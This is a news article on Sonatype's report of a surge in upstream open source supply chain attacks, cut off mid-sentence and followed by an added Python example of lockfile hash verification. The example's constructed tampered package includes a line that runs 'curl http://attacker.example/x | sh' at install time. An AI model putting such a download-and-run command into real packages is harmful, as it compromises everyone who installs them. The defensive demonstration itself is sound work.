Surge in cyber attacks targeting open source software projects - Help Net Security


There has been a massive 430% surge in next generation cyber attacks aimed at actively infiltrating open source software supply chains, Sonatype has found.



Rise of next-gen software supply chain attacks


According to the report, 929 next generation software supply chain attacks were recorded from July 2019 through May 2020. By comparison 216 such attacks were recorded in the four years between February 2015 and June 2019.


The difference between “next generation” and “legacy” software supply chain attacks is simple but important: next generation attacks like Octopus Scanner and electron-native-notify are strategic and involve bad actors intentionally targeting and surreptitiously compromising “upstream” open source projects, so that the malicious code they plant can be exploited once it inevitably flows “downstream” into the wild.


Conversely, legacy software supply chain attacks like Equifax are tactical and involve bad actors waiting f ..
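The upstream-compromise pattern described above only pays off for the attacker if downstream consumers install the altered artifact without noticing. One control a practitioner would reach for is pinning every dependency to a content hash and refusing to install anything that does not match. The following is an added example written for this page, not code from Sonatype or from the projects named in the report; the package names, file contents and hashes are constructed for illustration.

```python
import hashlib

# Constructed "lockfile": the hashes a project recorded when it last reviewed its
# dependencies. Names and contents are illustrative, not real packages.
CLEAN_PAD = b"module.exports = (s, n) => s.padStart(n);\n"
CLEAN_NOTIFY = b"module.exports = (m) => console.log(m);\n"

LOCKFILE = {
    "pad-ish": "sha256:" + hashlib.sha256(CLEAN_PAD).hexdigest(),
    "notify-ish": "sha256:" + hashlib.sha256(CLEAN_NOTIFY).hexdigest(),
}

# Constructed artifacts "fetched from the registry" today. notify-ish has been
# republished upstream with an extra line that runs a remote script at install time.
FETCHED = {
    "pad-ish": CLEAN_PAD,
    "notify-ish": CLEAN_NOTIFY
    + b"require('child_process').exec('curl http://attacker.example/x | sh');\n",
}


def verify_lockfile(lockfile, fetched):
    """Compare fetched artifacts against pinned hashes.

    Returns a list of (package, reason) for everything that must not be installed:
    a pinned package whose bytes no longer hash to the recorded value, a pinned
    package that is absent, or a package that was never pinned at all.
    """
    findings = []
    for name, pin in lockfile.items():
        data = fetched.get(name)
        if data is None:
            findings.append((name, "missing"))
            continue
        algo, _, expected = pin.partition(":")
        actual = hashlib.new(algo, data).hexdigest()
        if actual != expected:
            findings.append((name, "hash mismatch"))
    for name in fetched:
        if name not in lockfile:
            findings.append((name, "not pinned"))
    return findings


if __name__ == "__main__":
    for package, reason in verify_lockfile(LOCKFILE, FETCHED):
        print(f"refusing to install {package}: {reason}")
```

The check catches a release that changed after it was pinned, which is the downstream half of the attack the report describes. It says nothing about whether the pinned version was already malicious when it was reviewed, so hash pinning needs to be paired with review of new versions before the pin is updated.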
